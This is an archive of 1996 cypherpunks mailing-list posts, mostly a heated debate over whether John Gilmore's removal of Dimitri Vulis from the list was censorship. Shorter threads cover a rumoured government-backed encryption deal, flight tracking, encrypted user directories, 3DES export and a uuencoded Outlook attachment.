> > >What are you hiding behind your PGP?
> >
> > Okay, I'll bite.  Where is it said that a person who wants h[is,er]
> > privacy
> > is a criminal?  Charlie McCarthy might have said that.

[...deletia...]

> The more you PGP, the worse you look.  Nobody reads your e-mail,
> so stop being so paranoid.
>
> -aga

Sigh. I really don't have time for unimaginative trollers, and
you've caught your limit, so into the killfile you go. Still, I
would appreciate it if you could see your way clear to quit
posting these trolls on cypherpunks, since it does make it harder
to effectively filter the responses from people who make the
mistake of taking you seriously.

Thank you for your kind consideration,

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================




begin 600 WINMAIL.DAT
M>)\^(AH4`0:0" `$```````!``$``0>0!@`(````Y 0```````#H``$(@ <`
M& ```$E032Y-:6-R;W-O9G0@36%I;"Y.;W1E`#$(`06 `P`.````S <+``\`
M# `/`!<`!0`D`0$@@ ,`#@```,P'"P`/``P`#P`8``4`)0$!"8 !`"$````Q
M.45"-#DQ148T,T1$,#$Q.3,P0S P04$P,$$U1C8P1 `B!P$-@ 0``@````(`
M`@`!!( !`$ ```!213H@6U)%0E545$%,72!#96YS;W)S:&EP(&]N(&-Y<&AE
M<G!U;FMS/RP@9G)O;2!4:&4@3F5T;'D@3F5W<R `K!4!`Y &`/0&```:````
M`P`F```````#`#8``````!X`< `!````/ ```%M214)55%1!3%T@0V5N<V]R
M<VAI<"!O;B!C>7!H97)P=6YK<S\L(&9R;VT@5&AE($YE=&QY($YE=W,@``(!
M<0`!````&P````&[TRS")QY)ZGT]]!'0DPP`J@"E]@T``&Y*9P`#`"X`````
M``,`!A"T5Q>Q`P`'$$<#```>``@0`0```&4```!!1T%74D]413I72%D_05)%
M64]504-224U)3D%,/U=(051!4D593U5(241)3D="14A)3D193U524$=0/T]+
M05DL24Q,0DE415=(15)%25-)5%-!24142$%405!%4E-/3E=(3U=!``````,`
M$! ``````P`1$ `````"`0D0`0```+\#``"[`P``(@8``$Q:1G6BU5!"_P`*
M`0\"%0*D`^0%ZP*#`% 3`U0"`&-H"L!S973N,@8`!L,"@S(#Q@<3`H,&,P1&
M`@!P<G$Q()<(50>R`H,T$P]F-0/%0Q2S$B)S=&5M`H!]%PJ ",\)V3L9GS(U
M-0\"@ J!#;$+8&YG,3 ^,Q0@"PH4(0OQ$W!G8:P@=P-@&' Z"H4^'T(@5VAY
M/R 3<64@VGD(8" >8 4!;0N !T Z/Q[L805 "L @)&AI0F0+@&<@8F4BP&[&
M9" R!<!01U A*A[I`$]K87DL($DGTFP#(&)I&' N'^ ?H-\$D" @! `G``5 
M<PMP(X#2="(#(' $D',"(!YP+&AO'G `<'0$(&A;-00`+ 2071[I%-!I=KT`
MT'D>Z2<1((D?X$,1P69L") %T&-#"L GP'FR("#09V@%0!' =B @S2=W+@J%
M"H5;+B_@#;"^;!(`!S OX2FV'N=4)L!_+9 %L" D(_$ET"? ("!W3P6P$? @
M,QDP;VLF@4Z:;P;@9"V &:!A9 0@V2.C92T`P ,0+![G*&#Q)V!T;W C(2+R
M-E$*L2T`<&\BT"[F/A[G+6';'E N_%,ML2: 2322)A!U+8!D`B G+>4P4 > 
M(-L"$ 7 =0,``,!G(.$P4+\[D@-@)A H0270`'!D"H7%($$G+B%C874MPB.C
M^RS0(-!T)= V40N -I RTS)K`Q!L9@,0("1G;WTF@%,P4"80)=$*A3,@=?)L
M(X!A<!30!9 ',!AP_R<R!I @,P6@0O(1\" C0K&?); @D# P"L% 87%U)E#Y
M"H5P;QA@(O(RX3-1/3-7!" H<2K <";!<#Q0:_,]H0"0;F-#PSL0!Y$`P/YK
M0\,1P02!"H5 80W!!9!_/.(ZX4$1&'!%\3'1&:!S_T;P`( 'D0-2*"$VH$$Q
M***_2B,RX0J%(- 88$HR;T0@OT_1(O(@0A'P!1 (8',ZX/<N[3' `'!K(#,\
M$B.C4''_(X %H "!!($\T0(@-;92%O4\4&XJUCU6CU>?6*]9OZ(]"H4@2F$'
M@D$F@#U5PFE%L :02\ ?X"!\8R:@7/!E8CHBL ) <- Z+R]W7= N"X!+P L9
MH$EA+@6@;2]^=/]5V27@7B85$4C !;!4@URR^2/Q($8B\4BQ!1 ",%U @2QQ
M02 R,R!%$B 21F+004-BL$0@,-EC8#<W6N9?`T!?UUZB3URA7,%F#Q_@,S9C
MH#=8($0Y9S!BT#-CD#/E$B U8M Y0U8?:;]JSR]KWUI>+OP8P0!O$ ! `#D`
M0&7"NS'3NP$#`/$_"00```(!1P`!````,0```&,]55,[83T@.W ]26YF97)E
M;F-E.VP]3$%.1%)5+3DV,3$Q-3(P,34R,UHM-30Q.0`````"`?D_`0```$H`
M````````W*= R,!"$!JTN0@`*R_A@@$`````````+T\]24Y&15)%3D-%+T]5
M/4Y/5D%43R]#3CU214-)4$E%3E13+T-./5153DY9````'@#X/P$````5````
M2F%M97,@02X@5'5N;FEC;&EF9F4``````@'[/P$```!*`````````-RG0,C 
M0A :M+D(`"LOX8(!`````````"]//4E.1D5214Y#12]/53U.3U9!5$\O0TX]
M4D5#25!)14Y44R]#3CU454Y.60```!X`^C\!````%0```$IA;65S($$N(%1U
M;FYI8VQI9F9E`````$ `!S 0RY$3,=.[`4 `"#!P10V\,=.[`0,`#33]/P``
M`@$4- $````0````5)2AP"E_$!NEAP@`*RHE%QX`/0`!````!0```%)%.B `
M````"P`I```````+`",```````(!?P`!````4 ```#QC/553)6$]7R5P/4EN
M9F5R96YC925L/4Q!3D1252TY-C$Q,34R,#$U,C-:+34T,3E ;&%N9')U+FYO
7=F%T;RYI;F9E<F5N8V4R+F-O;3X``P(R
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Fri, 15 Nov 1996 09:14:48 -0800 (PST)
To: "Mark M." <cypherpunks@toad.com
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <Pine.LNX.3.95.961115114821.447A-100000@gak.voicenet.com>
Message-ID: <9611151718.AA02034@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Note that the libertarian party is the only
>non-mainstream party in history to get a candidate registered in all 50 states
>twice in a row. 

Untrue, Ross Perot managed it and gained ten times the votes.
Also the natural law party managed it, a fact which kida points
to the significance of the achievement. 

>It's also the third largest political party in the country.

Also untrue, the Reform party is a considerably more significant 
force. 

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Fri, 15 Nov 1996 12:40:53 -0800 (PST)
To: m5@tivoli.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611152040.MAA25591@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:
> Dave Hayes wrote:
> >  Symbolically, he punched holes in his ideology. That's my
> > opinion.
> Note that this is only true if John's ideology in the first place
> was what you think it was.  

Excellent point. In point of fact, even if John Gilmore explained
his ideology to me, I would *still* only have an ideology that was
what I thought it was. There is no chance that I can get John
Gilmore's exact ideology in my mind since our minds work differently. 

> He may have "punched holes" in the conception of John's ideology
> that you'd formed in your own mind, of course.

Yes, that is the case. Of course, my conception of "free speech" is
unique. I see no difference between a government, a group of network
administrators, or a panel of judges when it comes to censorship.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

The King decided to force his subjects to tell the truth. Nasrudin was 
first in line.  They asked him, "Where are you going?  Tell the truth
or be hanged"  "I am going," said Nasrudin, "to be hanged on that gallows."  
"I don't believe you."  "Very well, if I have told a lie, then hang me!" 
"But that would make it the truth!" "Exactly," said Nasrudin, "your truth."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 15 Nov 1996 12:45:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: A New Crypto Announcement--Could be Ominous
Message-ID: <v03007803aeb2869761df@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


(My traffic from the Cypherpunks list comes in bursts interspersed by long
gaps, so I don't know if this has been reported. It seems significant to
me.)

A few excerpts:

H-P ( Hewlett-Packard Co ) says RSA Data ( Security Dynamics Technologies
Inc ) in codes deal

PALO ALTO, Calif., Nov 15 (Reuter) - Hewlett-Packard Co. said Security
Dynamics Technologies Inc's RSA Data Security Inc electronic encryption
company is involved in its planned announcement Monday of new advance in
encryption technology.

Hewlett-Packard said technology the company's Chairman and Chief Executive
Lewis Platt is due to detail at the National Press Club on Monday aims
to resolve this roadblock in the use of electronic commerce over the Internet.
   ^^^^^^^^^^^^^^^^^^^^^^[emphasis added by Tim]

Hewlett-Packard officials declined to give precise details, but said the
technology has already received backing from the U.S. government and other
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
governments which it did not name, as well as major industry players.

Senior executives of Microsoft Corp and Intel Corp are among those
scheduled to make presentations on Monday, Hewlett-Packard said, but it
declined to identify other companies whose technologies will be involved.

----end of item---

It sounds ominous to me. Another backroom deal, probably for some form of
key recovery strategy, aka GAK.

--Tim May, awaiting Monday's announcement with trepidation

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Fri, 15 Nov 1996 12:59:31 -0800 (PST)
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611152059.MAA25768@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


> Umm, even if we accept Dave's claim that Gilmore pinched holes in 
> his ideology, these holes are no bigger than Dave Hayes's own holes,
> since he exercises censorship of Freedom Fighters mailing list.

Firstly, there is no "Freedom Fighters" mailing list. 

I have done nothing Gilmore didn't do. People can still send their
missives to freedom-knights without being subscribed.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

A person being delivered from the danger of a fierce lion does not object
whether this service is performed by unknown or illustrious individuals.

Why, therefore, do people seek knowledge from celebrities?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 15 Nov 1996 12:59:20 -0800 (PST)
To: snow <aga@dhp.com (aga)
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611152058.MAA26315@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


aga <aga@dhp.com> wrote:
>Let's stay on topic here -- John Gilmore is a censorous asshole
>for pulling Vulis's plug.  The topic has nothing to do with
>the Freedom-Knights.

At 12:19 AM 11/15/96 -0600, snow wrote:
>> [This is a rebuttal to a misguided news article.]
>> > Cypher-Censored
>> > By Declan McCullagh (declan@well.com)
>> >    The list is on Gilmore's machine and he can do what he wants with
>> >    it; he can moderate the postings, he can censor material, he can
>> >    shut the whole thing down. By kicking off an offending user, a
>> >    list owner merely exercises his property right. There's no
>> >    government involvement, so the First Amendment doesn't apply. And
>> >    the deleted, disgruntled user is free to start his own mailing
>> >    list with different rules.
>> 
>> Notice how, once the opposition is admitted to, the rationalization
>> begins. Suddenly this is not a matter of censorship, but of ownership.
>> Just as suddenly, the classic anti-free-speech arguments of "if you
>> don't like it, start yer own" begin to surface. (Anyone ever notice
>> how this resembles the "love it or leave it" mentality of certain
>> American patriotic organizations?)
>
>     It still isn't censorship. Censorship, at least in my dictionary, 
>refers to censor, which uses the word "Official" several times. Mr. 
>Gilmore is not an "Official" in a government sense, he maybe in the EFF
>sense, but this is not an "Official" EFF organ, so that doesn't count. 

Even more important is the fact that Mr. Gilmore did not prevent Mr. Vulis
from speaking.  No restraint on speech implies no censorship.  Therefor Mr.
Vulis was not censored.  Q.E.D.

You all are perfectly free to like or not like what Mr. Gilmore did. 
However, don't call it censorship because it wasn't.

-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 15 Nov 1996 12:58:53 -0800 (PST)
To: Lucky Green <cypherpunks@toad.com
Subject: Re: It is getting easier
Message-ID: <199611152058.MAA26324@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 PM 11/14/96 -0800, Lucky Green wrote:
>If I remember correctly, some of the newer transponders used on 
>commercial aircraft actually transmit GPS data back to the controller in 
>real time. I wonder how long it will be before the FAA will include such 
>information in their database.

I don't think new transponders make much difference.  The old ones heighten
the radar image of the airplane which gives an accurate 2D position.  This
position is automatically entered into the FAA computer which maintains the
ATC controller's display.  In the old style, altitude is determined by an
altimeter on the airplane which encoded into the transponder signal.

If newer transponders are returning GPS signals, the position may be more
accurate (but probably not unless they can decode the selective
availability signal).  (OBCrypto for those who care.)


>"To obtain the position of any passenger flight in the US within 10 
>meters, click here."

In either case, the Passenger Name Records for the flight are in the
airlines databases (and have been there for many years), and the airplane's
physical position is in the FAA's computer (and has been for many years). 
The ability to find the current position of an airplane, or a passenger
remains dependent on the incentives and disincentives for database linking
and application development.  There are no insurmountable technical
problems.  The technical problems are those of getting old-technology
software to do something new.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 15 Nov 1996 12:59:26 -0800 (PST)
To: Adam Back <ph@netcom.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611152058.MAA26346@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:44 PM 11/13/96 +0000, Adam Back wrote:
>A very good idea.  There was some discussion of this kind of thing a
>while back about doing this for Singapore.  The suggestion at the time
>was not to do it perfectly, but rather to arrange something simple to
>allow people to circumvent the censorship enforced through their
>compulsory use of a government censored web proxy.

I hope it is ready.  To quote from William Safire's 11/14/96 NYT column:

"Let's run a test.  "Information Technology and Political Control in
Singapore" is a paper just issued by Prof. Gary Rodan of Murdoch University
in Perth, Australia, distribued by Chalmers Johnson of the Japan Policy
Research Institute in Cardiff, Calif.  It's on this web site:
http://www.nmjc.ord/jpri/.

"If Lee blocks access, Singaporeans, try E-mail: cjohnson@ucsd.edu.  But be
careful, global business executives: the Architect of the New Century [Lee
Kuan Yew - wsf] may be monitoring everything you download."


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Fri, 15 Nov 1996 13:12:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Media seekers, reputation and banishment
Message-ID: <199611152112.NAA21513@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



> A community offers few punishments for asocial behavior. Killfiles
> are partly effective. But the strongest punishment is banishment.

The "community" didn't decide anything.  John Gilmore did.  His
machine, his mailing list, his decision, and his responsibility.

> The issue is "do we individually banish asocial louts or
> collectively?" and of course how do we decide who to banish.

Collectively => ban for people who don't want to ban the person.

> All of this is certainly easier when done individually yet it is
> often prudent and effective to have someone take action when they
> are in a position to do be effective. Gilmore acted properly in my
> opinion. And DV remains in my killfile.

If you still need a killfile, Gilmore wasn't very effective, was he?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Fri, 15 Nov 1996 10:13:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Mounting Crypted directories on Multiuser Machines.
In-Reply-To: <199611150654.AAA01811@smoke.suba.com>
Message-ID: <0mX=9z200YUe0_o5E0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

snow <snow@smoke.suba.com> writes:
<sniup description of user directories>
>        and inside each directory they have:
>  
>        /home/usr1/html/
>                  /files/
>                  /.login    
>                  /.usr1crypt
>  
>       such that /.usr1crypt gets mounted at _login_ time as a crypted file
>  system under /files.

Umm, I guess you could make mount setuid root or something. Is this
just a linux thing? But wait, there's more.  

>       Or am I missing something more basic? 

Yup.

>       It would seem that running something like this would do 2 things.
>    
>       1) It would be much more difficult to prove that a service provider 
>          knew what files a user was keeping lying around because unless
>          the user was logged in, not even the Sysadmin could "peek" at the
>          files.

There's nothing to prevent root from grabbing your password when you
log in. Root can see *everything.*

>       2) Provide the user with greater privacy. Users could keep PGP keys 
>          on the system without much risk, and as long as access was either
>          thru the console, or thru something like ssh, you should be rather
>          safe. 

If a user on the system has your password, they can edit your .login
to give them your filesystem password. If they have the root password,
well, you're screwed.

AKAIK, the only benefit od encrypted drives is that the sysadmin
cannot be forced to reveal the contents of the drive (5th amendment
and all). You could do the same thing on a multiuser system by having
one encrypted partition, and making symlinks from each user's
directory to their directy in the encrypted drive. This would be a bit
more efficient, I think.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMoyyeckz/YzIV3P5AQGrQwMAr+mOugO6IlmlXdOZzTKXHF/+gZCf5ZJe
qVan7XukQ/2xS1/kchSgnXJt5m00jDuwh/onfCblhb2eOKUP4+Wum93U9vXfEuxW
LJp6Za2S2xCK3oMa1InZtSGGFJkPFs6t
=HyQ2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Fri, 15 Nov 1996 13:15:12 -0800 (PST)
To: snow@smoke.suba.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611152113.NAA25851@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


>      So you are explaining your problems in advance. Good, it tells 
> thoughtful readers to take you with a grain of salt.  

What a wonderfully self-referential statement. That's exactly what
this statement does for you...

> > In person-to-person interaction, one's only real defense against what
> > one decides to call "unwanted" is to remove oneself from the arena of
> > interaction. It may not be possible to ignore or run away from certain
> > sources of input. 
>      You forget "shutting down" the source of input. Turning off the 
> radio, TV etc, or turning off the person speaking. 

If people have difficulty ignoring those on a mailing list or
newsgroup that they do not like, how can you expect them to know about
this herculean feat of responsibility?

> > >    The list is on Gilmore's machine and he can do what he wants with
> > >    it; he can moderate the postings, he can censor material, he can
> > >    shut the whole thing down. By kicking off an offending user, a
> > >    list owner merely exercises his property right. There's no
> > >    government involvement, so the First Amendment doesn't apply. And
> > >    the deleted, disgruntled user is free to start his own mailing
> > >    list with different rules.
> > Notice how, once the opposition is admitted to, the rationalization
> > begins. Suddenly this is not a matter of censorship, but of ownership.
> > Just as suddenly, the classic anti-free-speech arguments of "if you
> > don't like it, start yer own" begin to surface. (Anyone ever notice
> > how this resembles the "love it or leave it" mentality of certain
> > American patriotic organizations?)
>      It still isn't censorship. 

Call it what you will. In my eyes, here is someone who is attempting
(ineffectually, which is perhaps deliberate) to stop messages from
being sent to another human which used to be sent to that other human.

Censorship? Ownership? Why does ownership justify dishonor?

> Censorship, at least in my dictionary, refers to censor, which uses
> the word "Official" several times. Mr.  Gilmore is not an "Official"
> in a government sense, he maybe in the EFF sense, but this is not an
> "Official" EFF organ, so that doesn't count.

But he is an official of the list. Censorship is not just practiced by
governments...

>      "Editorial Control" means that someone decides who get's published and
> who doesn't. From your opposition to it, I guess you think that a magazine
> dedicated to poetry should print all poems submitted, or as many, selected
> in some sort of non-judgemental order, as they can fit. Or that a magazine
> should print any writings submitted to it. 

Resistance to lack of editorial control prevents one from seeing
the true nature of ideologies and opinions. Maybe you don't want this,
but why deny it to others? Still...

>      I run 4 mailing lists, one is personal, one is in the process of coming
> online, and 2 are up and running. One of these has a rule: No Politics allowed.
> I guess I am a pathetic little censorous worm huh? 

If that is what you wish to call yourself. I maintain no such position.

>      That is what freedom is, the ability to _do it yourself_ not the 
> requirement that others do it for you, or allow you to use what they 
> have already built. 

Freedom is anything but categorizable in the terms you are using.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

It has been said that man is a rational animal.  All my life I have
been searching for evidence which could support this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 15 Nov 1996 11:04:50 -0800 (PST)
To: hyperlex@hol.gr (George A. Stathis)
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611151044.IAA25992@prometheus.hol.gr>
Message-ID: <199611151919.NAA01357@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 12:19 =F0=EC 15/11/1996 -0600, snow wrote:
> (in the end)...
> >     That is what freedom is, the ability to _do it yourself_ not the=20
> >requirement that others do it for you, or allow you to use what they=20
> >have already built.=20
> Hey man, do they sell "FREEDOM KITS" in American Supermarkets? :-)
> ROTFL!

      Nope, you have to make your own. The Kit is mostly Education, which
is available to all. 

> (and started saying):
> [...]
> >> Just as suddenly, the classic anti-free-speech arguments of "if you
> >> don't like it, start yer own" begin to surface. (Anyone ever notice
> >> how this resembles the "love it or leave it" mentality of certain
> >> American patriotic organizations?)
> >     It still isn't censorship. Censorship, at least in my dictionary,=20
> >refers to censor, which uses the word "Official" several times.
> You mean that if... Dr. Dimitri Vulis hires a Mafia-man to kill ya,=20
> (to silence you) this wouldn't be censorship, since it would not be
> "Official"  ? :-)

     It would not be censorship, it would be Conspiracy to murder (I 
believe, the Legal types could give you the proper charge) on Vulis's part,
and attempted murder on the Hit Man's part. 

> 
> >Mr.=20
> >Gilmore is not an "Official" in a government sense, he maybe in the EFF
> >sense, but this is not an "Official" EFF organ, so that doesn't count.=20
> 
> OK, any bombs thrown in the offices of the Ecological Party are not
> official censorship either. It was _unofficial_ censorship by... "Motor
> Oil Corporation" trying to stop the Flow of Information (about their
> oil leakages polluting the Mediterranean Sea)... See what I mean?

     That is NOT censorship. A rake is not a shovel, you can dig with it,
but that doesn't make it a shovel. It simply isn't. 

> >     He is the OWNER of this list, and the machine it runs on. If he=
>  chooses
> >(which he didn't) to keep someone from using the list, it is his right.
> If I own a building and invite you to an open meeting inside this building
> do I own what you _say_ or your rights to _say_ it?=20

     Red Herring. Gilmore never claimed ownership over anyones writing, 
nor did he even make the claim that Vulis didn't have the right to 
say what he said, all he "claimed" (note quotes) was that Vulis wasn't 
welcome to say it here. 

> >     "Editorial Control" means that someone decides who get's published and
> >who doesn't. From your opposition to it, I guess you think that a magazine
> >dedicated to poetry should print all poems submitted, or as many, selected
> >in some sort of non-judgemental order, as they can fit. Or that a magazine
> >should print any writings submitted to it.=20
> See my other posting about why the "Editorial" analogy has serious flaws.

     I don't buy it.

> I don't see 'em mailing listes hangin' over the kiosk in the centre of

     Not yet. 

> town, ya know. Nor does the list-ownere make his bread out of 'em. And

     Wether he makes money off it or not is irrelevant. 

> finally, we readers aren't as stupid as to forget that we are also the
> WRITERS of them mailing listes! :-) :-)

     As the poets who send their drivel/art to a poetry mag. are the 
WRITERS of that magazine. 

> >> Mr. Gilmore, and other like minded parties, might want to consider
> >> what would happen if one parent company owned *all* communications
> >> media. Would they they be so supportive of the ideology of ownership
> >> and communciation they espouse?
> >     How would this happen? Setting up a press is fairly easy, at least=20
> >a small hand operated press. Start your own magazine, start your own
> >mailing list.=20
> 
> Bulshit!  If this happened, nobody would exist to allow us to express

     This doesn't make sense. 

> Are you telling us that setting up an entire _PRESS_ is fairly easy?
> Listen man, it's not. My printer (who printed the boxes for my software)
> will tell you this!  He'll also explain why my major competitor in Greece
> owns an entire Printing/Publishing house just for Computer Manuals
> (Singular S.A.).

     Setting up an entire Offset Web Press is difficult, setting up a 
press that will print on boxes and shit is not easy. Setting up 
a small hand operated press isn't that difficult. Note, I didn't say 
build, I just said set up. I have, in the past run a Vandercook Universal,
a small letter press. These are available used at very low costs by 
hobbyists all over America, and probably other parts of the world. Ture
your output is limited to what you can crank thru the press, but this
is just an example. 

    As I noted somewhere else, there are always Photocopiers, and 
small presses will never go away, there just is too much market for short
run stuff that the boys with the big presses don't want to deal with. 

> Setting up a mailing list is not _that_ easy, but it's still much more
> intricate and difficult than accepting the Basic Principles of Free
> Expression: DON'T KICK OUT GUESTS YOU INVITE TO "OPEN MEETINGS".
> (In the Internet or anywhere else in fact). If you don't like 'em
> guests don't invite them in the first place, or don't call your
> meetings "OPEN".

     Very few of the people on this list were "invited" most simply 
wandered in.

     Try this, organize a small "open meeting" of around 1500 to 2000
people. Show up, act like a fucking drunk, scream rude and untrue things
at the speakers, piss on the other guests. Let me know if people try
to get you to leave. 

> e.g. Just as aga tolerates me and vice versa, so should Gilmore
> tolerate Dimitri Vulis.=20

     It wan't his opnions, it was his actions. That is the difference.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Fri, 15 Nov 1996 13:46:06 -0800 (PST)
To: ses@tipper.oit.unc.edu
Subject: 3DES export stories? [was: British Telecom merger with MCI]
In-Reply-To: <Pine.SUN.3.91.961105090403.5329B-100000@tipper.oit.unc.edu>
Message-ID: <199611152126.NAA02273@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Mon, 4 Nov 1996, Adam Shostack wrote:
> 
> > Phil Karn failed to get an export license for 3des for foriegn offices
> > of Qualcomm, staffed by Americans.  See
> > www.eff.org/pub/Crypto/ITAR_export/nsa_3des_export_denial_0396.letter 
> 
> [whoops] 
> That's unusual - certainly, for the bigger companies it seems to be pretty
> automatic, especially for NATO countries. Of course, it could just be that 
> Phil is "known to the authorities". 

Sorry that the follow up is so late,  but can anyone give me *any*
examples where export of 3DES has been approved?  Please be as specific
as possible as to destination countries, use, etc.  First hand
knowledge is preferred.

Thanks,
Eric Blossom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stephen Boursy" <rent_control@msn.com>
Date: Fri, 15 Nov 1996 05:58:04 -0800 (PST)
To: "aga" <freedom-knights@jetcafe.org
Subject: RE: Censor John Gilmore -- EFF is a disgrace!
Message-ID: <UPMAIL07.199611151356330254@msn.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From:  aga
Sent:  Thursday, November 14, 1996 8:30 AM
To:  freedom-knights@jetcafe.org
Cc:  Dave Hayes; InterNet Freedom Council; Declan McCullagh; 
cypherpunks@toad.com
Subject:  Censor John Gilmore -- EFF is a disgrace!

On Wed, 13 Nov 1996, Declan McCullagh wrote:

> Date: Wed, 13 Nov 1996 13:12:50 -0800 (PST)
> From: Declan McCullagh <declan@well.com>
> Reply-To: freedom-knights@jetcafe.org
> To: Dave Hayes <dave@kachina.jetcafe.org>
> Cc: freedom-knights@jetcafe.org, cypherpunks@toad.com
> Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News 
> 
> I am amused. I gave Dave Hayes about an 8.5 out of 10 on the scale of
> meaningless political rants.
> 

Jealousy rears it's ugly head.  You just wish you had the credibility
that Dave Hayes has.

Declan has no credibility but quite honestly it doesn't seem to
be worth much effort on the Freedom Knight list to debate
the censorous fool.  Let's keep our energies in that regard
to the public forum where exposure to this type of nonsense
will do the most good.


> * "Political safety?" I stand by my record as a writer. Check out
> http://www.eff.org/pub/Publications/Declan_McCullagh/ for some of my
> recent articles. Political safety? Hardly.
> 

This Declan_McCullagh is a long-time cabal.member, so his critique
of a Freedom-Knight like Dave Hayes is to be given short shrift.


And again-he's not worth the effort debating privately.  As far as
the mailing list goes I'm sure we can get forwards from some kind
soul and just post the whole thing publically on usenet for
free and open discussion.


> * Dave says "Notice that the net is compared to a home or private club." 
> Wrong. I never compared the Net to such. However, a mailing list run on a
> computer in someone's home with his own cash is very similar to a private
> club.  There are private speech restrictions on the Net. Gated communities
> exist.  Try to join the "lawprofs" mailing list. You can't; you're not
> (and quite obviously anything but) a law professor. Censorship? Not quite. 
> 

None of that analogy is applicable to the cyberpunks list.
When a list gets as big as that, it it no longer to be considered
a "mailing-list" but it is a _public_ forum.  The whole problem
here is the abuse of power by both the EFF and John Gilmore.


  Well then let's put their precious censored mailing list in 
the public domain.


> * Contrary to what you seem to be asserting, Gilmore hasn't blocked Vulis
> from posting. 
> 
> * Dave warns us to consider "what would happen if one parent company owned
> *all* communications media." Then we have problems. I've written about
> this in an Internet Underground magazine column. However, this is not the
> case now. Or are you arguing the government should get involved and force
> Gilmore to allow Vulis on his list?
> 

